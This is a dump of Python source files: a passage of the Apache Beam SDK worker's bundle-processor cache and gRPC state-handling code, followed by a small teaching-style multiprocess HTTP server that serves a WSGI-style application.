handlers to be used by a ``bundle_processor.BundleProcessor`` during
processing.
data_channel_factory (``data_plane.DataChannelFactory``)
active_bundle_processors (dict): A dictionary, indexed by instruction IDs,
containing ``bundle_processor.BundleProcessor`` objects that are currently
active processing the corresponding instruction.
cached_bundle_processors (dict): A dictionary, indexed by bundle processor
id, of cached ``bundle_processor.BundleProcessor`` that are not currently
performing processing.
"""
periodic_shutdown = None # type: Optional[PeriodicThread]
def __init__(
self,
state_handler_factory, # type: StateHandlerFactory
data_channel_factory, # type: data_plane.DataChannelFactory
fns # type: MutableMapping[str, beam_fn_api_pb2.ProcessBundleDescriptor]
):
# type: (...) -> None
self.fns = fns
self.state_handler_factory = state_handler_factory
self.data_channel_factory = data_channel_factory
self.known_not_running_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.failed_instruction_ids = collections.OrderedDict(
) # type: collections.OrderedDict[str, bool]
self.active_bundle_processors = {
} # type: Dict[str, Tuple[str, bundle_processor.BundleProcessor]]
self.cached_bundle_processors = collections.defaultdict(
list) # type: DefaultDict[str, List[bundle_processor.BundleProcessor]]
self.last_access_times = collections.defaultdict(
float) # type: DefaultDict[str, float]
self._schedule_periodic_shutdown()
self._lock = threading.Lock()
def register(self, bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
"""Register a ``beam_fn_api_pb2.ProcessBundleDescriptor`` by its id."""
self.fns[bundle_descriptor.id] = bundle_descriptor
def activate(self, instruction_id):
# type: (str) -> None
"""Makes the ``instruction_id`` known to the bundle processor.
Allows ``lookup`` to return ``None``. Necessary if ``lookup`` can occur
before ``get``.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
def get(self, instruction_id, bundle_descriptor_id):
# type: (str, str) -> bundle_processor.BundleProcessor
"""
Return the requested ``BundleProcessor``, creating it if necessary.
Moves the ``BundleProcessor`` from the inactive to the active cache.
"""
with self._lock:
try:
# pop() is threadsafe
processor = self.cached_bundle_processors[bundle_descriptor_id].pop()
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
except IndexError:
pass
# Make sure we instantiate the processor while not holding the lock.
processor = bundle_processor.BundleProcessor(
self.fns[bundle_descriptor_id],
self.state_handler_factory.create_state_handler(
self.fns[bundle_descriptor_id].state_api_service_descriptor),
self.data_channel_factory)
with self._lock:
self.active_bundle_processors[
instruction_id] = bundle_descriptor_id, processor
try:
del self.known_not_running_instruction_ids[instruction_id]
except KeyError:
# The instruction may have not been pre-registered before execution
# since activate() may have never been invoked
pass
return processor
def lookup(self, instruction_id):
# type: (str) -> Optional[bundle_processor.BundleProcessor]
"""
Return the requested ``BundleProcessor`` from the cache.
Will return ``None`` if the BundleProcessor is known but not yet ready. Will
raise an error if the ``instruction_id`` is not known or has been discarded.
"""
with self._lock:
if instruction_id in self.failed_instruction_ids:
raise RuntimeError(
'Bundle processing associated with %s has failed. '
'Check prior failing response for details.' % instruction_id)
processor = self.active_bundle_processors.get(
instruction_id, (None, None))[-1]
if processor:
return processor
if instruction_id in self.known_not_running_instruction_ids:
return None
raise RuntimeError('Unknown process bundle id %s.' % instruction_id)
def discard(self, instruction_id):
# type: (str) -> None
"""
Marks the instruction id as failed shutting down the ``BundleProcessor``.
"""
with self._lock:
self.failed_instruction_ids[instruction_id] = True
while len(self.failed_instruction_ids) > MAX_FAILED_INSTRUCTIONS:
self.failed_instruction_ids.popitem(last=False)
processor = self.active_bundle_processors[instruction_id][1]
del self.active_bundle_processors[instruction_id]
# Perform the shutdown while not holding the lock.
processor.shutdown()
def release(self, instruction_id):
# type: (str) -> None
"""
Release the requested ``BundleProcessor``.
Resets the ``BundleProcessor`` and moves it from the active to the
inactive cache.
"""
with self._lock:
self.known_not_running_instruction_ids[instruction_id] = True
while len(self.known_not_running_instruction_ids
) > MAX_KNOWN_NOT_RUNNING_INSTRUCTIONS:
self.known_not_running_instruction_ids.popitem(last=False)
descriptor_id, processor = (
self.active_bundle_processors.pop(instruction_id))
# Make sure that we reset the processor while not holding the lock.
processor.reset()
with self._lock:
self.last_access_times[descriptor_id] = time.time()
self.cached_bundle_processors[descriptor_id].append(processor)
def shutdown(self):
# type: () -> None
"""
Shutdown all ``BundleProcessor``s in the cache.
"""
if self.periodic_shutdown:
self.periodic_shutdown.cancel()
self.periodic_shutdown.join()
self.periodic_shutdown = None
for instruction_id in list(self.active_bundle_processors.keys()):
self.discard(instruction_id)
for cached_bundle_processors in self.cached_bundle_processors.values():
BundleProcessorCache._shutdown_cached_bundle_processors(
cached_bundle_processors)
def _schedule_periodic_shutdown(self):
# type: () -> None
def shutdown_inactive_bundle_processors():
# type: () -> None
for descriptor_id, last_access_time in self.last_access_times.items():
if (time.time() - last_access_time >
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S):
BundleProcessorCache._shutdown_cached_bundle_processors(
self.cached_bundle_processors[descriptor_id])
self.periodic_shutdown = PeriodicThread(
DEFAULT_BUNDLE_PROCESSOR_CACHE_SHUTDOWN_THRESHOLD_S,
shutdown_inactive_bundle_processors)
self.periodic_shutdown.daemon = True
self.periodic_shutdown.start()
@staticmethod
def _shutdown_cached_bundle_processors(cached_bundle_processors):
# type: (List[bundle_processor.BundleProcessor]) -> None
try:
while True:
# pop() is threadsafe
bundle_processor = cached_bundle_processors.pop()
bundle_processor.shutdown()
except IndexError:
pass
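# Editorial note (hedged summary of the cache above): a bundle's instruction id
# typically moves through BundleProcessorCache as
#   activate(instruction_id)       -> id is known; lookup() may return None
#   get(instruction_id, desc_id)   -> processor placed in the active cache
#   release(instruction_id)        -> processor reset and returned to the idle cache
#   discard(instruction_id)        -> on failure, processor is shut down instead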
class SdkWorker(object):
def __init__(
self,
bundle_processor_cache, # type: BundleProcessorCache
state_cache_metrics_fn=list, # type: Callable[[], Iterable[metrics_pb2.MonitoringInfo]]
profiler_factory=None, # type: Optional[Callable[..., Profile]]
):
# type: (...) -> None
self.bundle_processor_cache = bundle_processor_cache
self.state_cache_metrics_fn = state_cache_metrics_fn
self.profiler_factory = profiler_factory
def do_instruction(self, request):
# type: (beam_fn_api_pb2.InstructionRequest) -> beam_fn_api_pb2.InstructionResponse
request_type = request.WhichOneof('request')
if request_type:
# E.g. if register is set, this will call self.register(request.register))
return getattr(self, request_type)(
getattr(request, request_type), request.instruction_id)
else:
raise NotImplementedError
def register(
self,
request, # type: beam_fn_api_pb2.RegisterRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Registers a set of ``beam_fn_api_pb2.ProcessBundleDescriptor``s.
This set of ``beam_fn_api_pb2.ProcessBundleDescriptor`` come as part of a
``beam_fn_api_pb2.RegisterRequest``, which the runner sends to the SDK
worker before starting processing to register stages.
"""
for process_bundle_descriptor in request.process_bundle_descriptor:
self.bundle_processor_cache.register(process_bundle_descriptor)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
register=beam_fn_api_pb2.RegisterResponse())
def process_bundle(
self,
request, # type: beam_fn_api_pb2.ProcessBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
bundle_processor = self.bundle_processor_cache.get(
instruction_id, request.process_bundle_descriptor_id)
try:
with bundle_processor.state_handler.process_instruction_id(
instruction_id, request.cache_tokens):
with self.maybe_profile(instruction_id):
delayed_applications, requests_finalization = (
bundle_processor.process_bundle(instruction_id))
monitoring_infos = bundle_processor.monitoring_infos()
monitoring_infos.extend(self.state_cache_metrics_fn())
response = beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle=beam_fn_api_pb2.ProcessBundleResponse(
residual_roots=delayed_applications,
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
},
requires_finalization=requests_finalization))
# Don't release here if finalize is needed.
if not requests_finalization:
self.bundle_processor_cache.release(instruction_id)
return response
except: # pylint: disable=broad-except
# Don't re-use bundle processors on failure.
self.bundle_processor_cache.discard(instruction_id)
raise
def process_bundle_split(
self,
request, # type: beam_fn_api_pb2.ProcessBundleSplitRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
process_bundle_split = (
processor.try_split(request)
if processor else beam_fn_api_pb2.ProcessBundleSplitResponse())
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_split=process_bundle_split)
def process_bundle_progress(
self,
request, # type: beam_fn_api_pb2.ProcessBundleProgressRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
monitoring_infos = processor.monitoring_infos()
else:
# Return an empty response if we aren't running. This can happen
# if the ProcessBundleRequest has not started or already finished.
monitoring_infos = []
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id,
process_bundle_progress=beam_fn_api_pb2.ProcessBundleProgressResponse(
monitoring_infos=monitoring_infos,
monitoring_data={
SHORT_ID_CACHE.get_short_id(info): info.payload
for info in monitoring_infos
}))
def finalize_bundle(
self,
request, # type: beam_fn_api_pb2.FinalizeBundleRequest
instruction_id # type: str
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
try:
processor = self.bundle_processor_cache.lookup(request.instruction_id)
except RuntimeError:
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, error=traceback.format_exc())
if processor:
try:
finalize_response = processor.finalize_bundle()
self.bundle_processor_cache.release(request.instruction_id)
return beam_fn_api_pb2.InstructionResponse(
instruction_id=instruction_id, finalize_bundle=finalize_response)
except:
self.bundle_processor_cache.discard(request.instruction_id)
raise
# We can reach this state if there was an erroneous request to finalize
# the bundle while it is being initialized or has already been finalized
# and released.
raise RuntimeError(
'Bundle is not in a finalizable state for %s' % instruction_id)
@contextlib.contextmanager
def maybe_profile(self, instruction_id):
# type: (str) -> Iterator[None]
if self.profiler_factory:
profiler = self.profiler_factory(instruction_id)
if profiler:
with profiler:
yield
else:
yield
else:
yield
class StateHandler(metaclass=abc.ABCMeta):
"""An abstract object representing a ``StateHandler``."""
@abc.abstractmethod
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
raise NotImplementedError(type(self))
@abc.abstractmethod
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class StateHandlerFactory(metaclass=abc.ABCMeta):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
"""Returns a ``StateHandler`` from the given ApiServiceDescriptor."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
# type: () -> None
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcStateHandlerFactory(StateHandlerFactory):
"""A factory for ``GrpcStateHandler``.
Caches the created channels by ``state descriptor url``.
"""
def __init__(self, state_cache, credentials=None):
# type: (StateCache, Optional[grpc.ChannelCredentials]) -> None
self._state_handler_cache = {} # type: Dict[str, CachingStateHandler]
self._lock = threading.Lock()
self._throwing_state_handler = ThrowingStateHandler()
self._credentials = credentials
self._state_cache = state_cache
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> CachingStateHandler
if not api_service_descriptor:
return self._throwing_state_handler
url = api_service_descriptor.url
if url not in self._state_handler_cache:
with self._lock:
if url not in self._state_handler_cache:
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size is
# controlled in a layer above.
options = [('grpc.max_receive_message_length', -1),
('grpc.max_send_message_length', -1)]
if self._credentials is None:
_LOGGER.info('Creating insecure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=options)
else:
_LOGGER.info('Creating secure state channel for %s.', url)
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=options)
_LOGGER.info('State channel established.')
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor())
self._state_handler_cache[url] = GlobalCachingStateHandler(
self._state_cache,
GrpcStateHandler(
beam_fn_api_pb2_grpc.BeamFnStateStub(grpc_channel)))
return self._state_handler_cache[url]
def close(self):
# type: () -> None
_LOGGER.info('Closing all cached gRPC state handlers.')
for _, state_handler in self._state_handler_cache.items():
state_handler.done()
self._state_handler_cache.clear()
self._state_cache.evict_all()
class CachingStateHandler(metaclass=abc.ABCMeta):
@abc.abstractmethod
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise NotImplementedError(type(self))
@abc.abstractmethod
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise NotImplementedError(type(self))
@abc.abstractmethod
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise NotImplementedError(type(self))
@abc.abstractmethod
def done(self):
# type: () -> None
raise NotImplementedError(type(self))
class ThrowingStateHandler(CachingStateHandler):
"""A caching state handler that errors on any requests."""
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor '
'for bundle id %s.' % bundle_id)
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor without '
'state ApiServiceDescriptor for state key %s.' % state_key)
def done(self):
# type: () -> None
raise RuntimeError(
'Unable to handle state requests for ProcessBundleDescriptor.')
class GrpcStateHandler(StateHandler):
_DONE = Sentinel.sentinel
def __init__(self, state_stub):
# type: (beam_fn_api_pb2_grpc.BeamFnStateStub) -> None
self._lock = threading.Lock()
self._state_stub = state_stub
self._requests = queue.Queue(
) # type: queue.Queue[Union[beam_fn_api_pb2.StateRequest, Sentinel]]
self._responses_by_id = {} # type: Dict[str, _Future]
self._last_id = 0
self._exception = None # type: Optional[Exception]
self._context = threading.local()
self.start()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id):
# type: (str) -> Iterator[None]
if getattr(self._context, 'process_instruction_id', None) is not None:
raise RuntimeError(
'Already bound to %r' % self._context.process_instruction_id)
self._context.process_instruction_id = bundle_id
try:
yield
finally:
self._context.process_instruction_id = None
def start(self):
# type: () -> None
self._done = False
def request_iter():
# type: () -> Iterator[beam_fn_api_pb2.StateRequest]
while True:
request = self._requests.get()
if request is self._DONE or self._done:
break
yield request
responses = self._state_stub.State(request_iter())
def pull_responses():
# type: () -> None
try:
for response in responses:
# Popping an item from a dictionary is atomic in cPython
future = self._responses_by_id.pop(response.id)
future.set(response)
if self._done:
break
except Exception as e:
self._exception = e
raise
reader = threading.Thread(target=pull_responses, name='read_state')
reader.daemon = True
reader.start()
def done(self):
# type: () -> None
self._done = True
self._requests.put(self._DONE)
def get_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
response = self._blocking_request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
get=beam_fn_api_pb2.StateGetRequest(
continuation_token=continuation_token)))
return response.get.data, response.get.continuation_token
def append_raw(
self,
state_key, # type: Optional[beam_fn_api_pb2.StateKey]
data # type: bytes
):
# type: (...) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key,
append=beam_fn_api_pb2.StateAppendRequest(data=data)))
def clear(self, state_key):
# type: (Optional[beam_fn_api_pb2.StateKey]) -> _Future
return self._request(
beam_fn_api_pb2.StateRequest(
state_key=state_key, clear=beam_fn_api_pb2.StateClearRequest()))
def _request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> _Future[beam_fn_api_pb2.StateResponse]
request.id = self._next_id()
request.instruction_id = self._context.process_instruction_id
# Adding a new item to a dictionary is atomic in cPython
self._responses_by_id[request.id] = future = _Future[
beam_fn_api_pb2.StateResponse]()
# Request queue is thread-safe
self._requests.put(request)
return future
def _blocking_request(self, request):
# type: (beam_fn_api_pb2.StateRequest) -> beam_fn_api_pb2.StateResponse
req_future = self._request(request)
while not req_future.wait(timeout=1):
if self._exception:
raise self._exception
elif self._done:
raise RuntimeError()
response = req_future.get()
if response.error:
raise RuntimeError(response.error)
else:
return response
def _next_id(self):
# type: () -> str
with self._lock:
# Use a lock here because this GrpcStateHandler is shared across all
# requests which have the same process bundle descriptor. State requests
# can concurrently access this section if a Runner uses threads / workers
# (aka "parallelism") to send data to this SdkHarness and its workers.
self._last_id += 1
request_id = self._last_id
return str(request_id)
class GlobalCachingStateHandler(CachingStateHandler):
""" A State handler which retrieves and caches state.
If caching is activated, caches across bundles using a supplied cache token.
If activated but no cache token is supplied, caching is done at the bundle
level.
"""
def __init__(
self,
global_state_cache, # type: StateCache
underlying_state # type: StateHandler
):
# type: (...) -> None
self._underlying = underlying_state
self._state_cache = global_state_cache
self._context = threading.local()
@contextlib.contextmanager
def process_instruction_id(self, bundle_id, cache_tokens):
# type: (str, Iterable[beam_fn_api_pb2.ProcessBundleRequest.CacheToken]) -> Iterator[None]
if getattr(self._context, 'user_state_cache_token', None) is not None:
raise RuntimeError(
'Cache tokens already set to %s' %
self._context.user_state_cache_token)
self._context.side_input_cache_tokens = {}
user_state_cache_token = None
for cache_token_struct in cache_tokens:
if cache_token_struct.HasField("user_state"):
# There should only be one user state token present
assert not user_state_cache_token
user_state_cache_token = cache_token_struct.token
elif cache_token_struct.HasField("side_input"):
self._context.side_input_cache_tokens[
cache_token_struct.side_input.transform_id,
cache_token_struct.side_input.
side_input_id] = cache_token_struct.token
# TODO: Consider a two-level cache to avoid extra logic and locking
# for items cached at the bundle level.
self._context.bundle_cache_token = bundle_id
try:
self._state_cache.initialize_metrics()
self._context.user_state_cache_token = user_state_cache_token
with self._underlying.process_instruction_id(bundle_id):
yield
finally:
self._context.side_input_cache_tokens = {}
self._context.user_state_cache_token = None
self._context.bundle_cache_token = None
def blocking_get(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
cache_token = self._get_cache_token(state_key)
if not cache_token:
# Cache disabled / no cache token. Can't do a lookup/store in the cache.
# Fall back to lazily materializing the state, one element at a time.
return self._lazy_iterator(state_key, coder)
# Cache lookup
cache_state_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_state_key, cache_token)
if cached_value is None:
# Cache miss, need to retrieve from the Runner
# Further size estimation or the use of the continuation token on the
# runner side could fall back to materializing one item at a time.
# https://jira.apache.org/jira/browse/BEAM-8297
materialized = cached_value = (
self._partially_cached_iterable(state_key, coder))
if isinstance(materialized, (list, self.ContinuationIterable)):
self._state_cache.put(cache_state_key, cache_token, materialized)
else:
_LOGGER.error(
"Uncacheable type %s for key %s. Not caching.",
materialized,
state_key)
return cached_value
def extend(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
elements, # type: Iterable[Any]
):
# type: (...) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
# Update the cache
cache_key = self._convert_to_cache_key(state_key)
cached_value = self._state_cache.get(cache_key, cache_token)
# Keep in mind that the state for this key can be evicted
# while executing this function. Either read or write to the cache
# but never do both here!
if cached_value is None:
# We have never cached this key before, first retrieve state
cached_value = self.blocking_get(state_key, coder)
# Just extend the already cached value
if isinstance(cached_value, list):
# Materialize provided iterable to ensure reproducible iterations,
# here and when writing to the state handler below.
elements = list(elements)
# The state is fully cached and can be extended
cached_value.extend(elements)
elif isinstance(cached_value, self.ContinuationIterable):
# The state is too large to be fully cached (continuation token used),
        # only the first part is cached, the rest is enumerated via the runner.
pass
else:
# When a corrupt value made it into the cache, we have to fail.
raise Exception("Unexpected cached value: %s" % cached_value)
# Write to state handler
out = coder_impl.create_OutputStream()
for element in elements:
coder.encode_to_stream(element, out, True)
return self._underlying.append_raw(state_key, out.get())
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
cache_token = self._get_cache_token(state_key)
if cache_token:
cache_key = self._convert_to_cache_key(state_key)
self._state_cache.clear(cache_key, cache_token)
return self._underlying.clear(state_key)
def done(self):
# type: () -> None
self._underlying.done()
def _lazy_iterator(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder, # type: coder_impl.CoderImpl
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Iterator[Any]
"""Materializes the state lazily, one element at a time.
    :return: A generator that yields the next element each time it is advanced.
    (A self-contained, illustrative sketch of this continuation-token paging
    pattern follows this class.)
"""
while True:
data, continuation_token = (
self._underlying.get_raw(state_key, continuation_token))
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
yield coder.decode_from_stream(input_stream, True)
if not continuation_token:
break
def _get_cache_token(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> Optional[bytes]
if not self._state_cache.is_cache_enabled():
return None
elif state_key.HasField('bag_user_state'):
if self._context.user_state_cache_token:
return self._context.user_state_cache_token
else:
return self._context.bundle_cache_token
elif state_key.WhichOneof('type').endswith('_side_input'):
side_input = getattr(state_key, state_key.WhichOneof('type'))
return self._context.side_input_cache_tokens.get(
(side_input.transform_id, side_input.side_input_id),
self._context.bundle_cache_token)
return None
def _partially_cached_iterable(
self,
state_key, # type: beam_fn_api_pb2.StateKey
coder # type: coder_impl.CoderImpl
):
# type: (...) -> Iterable[Any]
"""Materialized the first page of data, concatenated with a lazy iterable
of the rest, if any.
"""
data, continuation_token = self._underlying.get_raw(state_key, None)
head = []
input_stream = coder_impl.create_InputStream(data)
while input_stream.size() > 0:
head.append(coder.decode_from_stream(input_stream, True))
if not continuation_token:
return head
else:
return self.ContinuationIterable(
head,
functools.partial(
self._lazy_iterator, state_key, coder, continuation_token))
class ContinuationIterable(Generic[T]):
def __init__(self, head, continue_iterator_fn):
# type: (Iterable[T], Callable[[], Iterable[T]]) -> None
self.head = head
self.continue_iterator_fn = continue_iterator_fn
def __iter__(self):
# type: () -> Iterator[T]
for item in self.head:
yield item
for item in self.continue_iterator_fn():
yield item
@staticmethod
def _convert_to_cache_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
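# --- Illustrative sketch (not part of the Beam SDK): the continuation-token
# paging pattern used by _lazy_iterator and _partially_cached_iterable above,
# reduced to plain Python. The fake backend, its tokens and its page contents
# are assumptions made only for this demo.
def _demo_paged_fetch():
  # type: () -> list
  pages = {
      None: (['a', 'b'], 'tok1'),
      'tok1': (['c', 'd'], 'tok2'),
      'tok2': (['e'], None),
  }

  def get_raw(continuation_token):
    # Mimics StateHandler.get_raw: returns (data, continuation_token), where a
    # falsy continuation token means there are no further pages.
    return pages[continuation_token]

  def lazy_iterator():
    continuation_token = None
    while True:
      data, continuation_token = get_raw(continuation_token)
      for element in data:
        yield element
      if not continuation_token:
        break

  return list(lazy_iterator())  # ['a', 'b', 'c', 'd', 'e']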
class _Future(Generic[T]):
"""A simple future object to implement blocking requests.
"""
def __init__(self):
# type: () -> None
self._event = threading.Event()
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
return self._event.wait(timeout)
def get(self, timeout=None):
# type: (Optional[float]) -> T
if self.wait(timeout):
return self._value
else:
raise LookupError()
def set(self, value):
# type: (T) -> None
self._value = value
self._event.set()
@classmethod
def done(cls):
# type: () -> _Future[None]
if not hasattr(cls, 'DONE'):
done_future = _Future[None]()
done_future.set(None)
cls.DONE = done_future # type: ignore[attr-defined]
return cls.DONE # type: ignore[attr-defined]
class KeyedDefaultDict(DefaultDict[_KT, _VT]):
if TYPE_CHECKING:
# we promise to only use a subset of what DefaultDict can do
def __init__(self, default_factory):
# type: (Callable[[_KT], _VT]) -> None
pass
def __missing__(self, key):
# type: (_KT) -> _VT
# typing: default_factory takes an arg, but the base class does not
self[key] = self.default_factory(key) # type: ignore # pylint: disable=E1137
return self[key]
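# --- Illustrative sketch (not part of the Beam SDK): how the _Future defined
# above hands a response from one thread to another. In the real code,
# _request() registers the future and the pull_responses reader thread calls
# set(); the thread and payload below are invented purely for this example.
def _demo_future_handoff():
  # type: () -> str
  import threading  # re-import keeps the sketch self-contained

  fut = _Future()  # type: _Future[str]

  def respond():
    fut.set('response-payload')

  threading.Thread(target=respond).start()
  # wait() blocks until set() is called (or the timeout expires); get() then
  # returns the stored value.
  assert fut.wait(timeout=5)
  return fut.get()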
|
server.py
|
'''
An HTTP server packaged as a class (same structure as "static_web_server.py").
Through the application passed in, it can serve HTML files from './static' and
run the xx.py scripts in './wsgipython', returning their output.
1. create a socket
2. bind & reuse addr
3. listen
4. while True:
4.1 accept
4.2 new client comes=> create a new process to handle it
'''
import socket
import multiprocessing
import os
import sys
class HTTPServer(object):
'''
    A class that creates an HTTP server
'''
def __init__(self,application):
'''
        application: a WSGI-style callable, app(env, start_response), that returns the response body as a str
'''
self.application=application
self.server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
def run(self,listen_num):
'''
        listen_num: the backlog passed to listen(), i.e. the maximum number of queued connections
'''
self.server_socket.listen(listen_num)
while True:
client_socket,client_addr=self.server_socket.accept()
print("%s:%s connected."%(str(client_addr[0]),str(client_addr[1])))
p = multiprocessing.Process(target=self.handle_client,args=[client_socket,client_addr])
p.start()
client_socket.close()
def bind(self,addr):
'''
addr: a tuple (ip,port)
'''
self.server_socket.bind(addr)
def start_response(self,status,headers):
'''
        Construct the full response header and store it in self.response_header.
        :status: e.g. '200 OK'
        :headers: e.g. [('Content-Type', 'text/html')]
        :return: NoneType
        :modifies self.response_header: e.g. 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n'
'''
self.response_header='HTTP/1.1 '+status+'\r\n'
for header in headers:
self.response_header+="%s: %s\r\n"%(header[0],header[1]) # ": " has a space
self.response_header+="Author: orris\r\n"
def handle_client(self,client_socket,client_addr):
'''
A function that handles the client's request
1. recv
2. deal with the message
2.1 get the required path, such as "/","/ctime"
2.2 Construct "env" dict( add "PATH_INFO"...)
        2.3 call the application to fill in the response header (via start_response) and get the body
2.4 Construct response (splice the header and body)
3. send back
'''
        recv_data = client_socket.recv(1024)
        if not recv_data:
            # Client closed the connection without sending a request.
            client_socket.close()
            return
        request_start_line = recv_data.decode('utf-8').split('\r\n')[0]
        import re
        print(request_start_line)
        match = re.match(r'\w+ (/[^ ]*) ', request_start_line)
        if match is None:
            # Not a request line we can parse; drop the connection.
            client_socket.close()
            return
        path = match.group(1)
        env = {"PATH_INFO": path}
        response_body = self.application(env, self.start_response)
        response = self.response_header + '\r\n' + response_body
        client_socket.send(response.encode('utf-8'))
        client_socket.close()
def main():
    '''
    Usage: python server.py framework:app
    :framework: a .py file that implements the web framework
    :app: an Application object that holds the URL routes (we edit the routes
          in the framework) and the WSGI application
    (A hypothetical example app of the expected shape is sketched right after
    this function.)
    1. get the framework module and the app object
    2. use the app to create an HTTP server
    3. bind
    4. run
    '''
if len(sys.argv) != 2:
print('-'*30)
print('tips:')
print('python server.py framework:app')
print('-'*30)
exit()
else:
module_name,app_name=sys.argv[1].split(":")
module=__import__(module_name)
app=getattr(module,app_name)
http_server=HTTPServer(app)
http_server.bind(('127.0.0.1',2333))
http_server.run(100)
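# --- Hypothetical example of the kind of "app" object this server expects.
# It would normally live in a separate framework module and be passed on the
# command line as "python server.py framework:app"; the name example_app and
# the response below are invented purely for illustration.
def example_app(env, start_response):
    '''
    A minimal WSGI-style application: it reads PATH_INFO from env, fills in
    the response header via start_response, and returns the response body.
    '''
    status = '200 OK'
    headers = [('Content-Type', 'text/html')]
    start_response(status, headers)
    return '<h1>Hello from %s</h1>' % env['PATH_INFO']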
if __name__ == '__main__':
main()
|
simple_queue.py
|
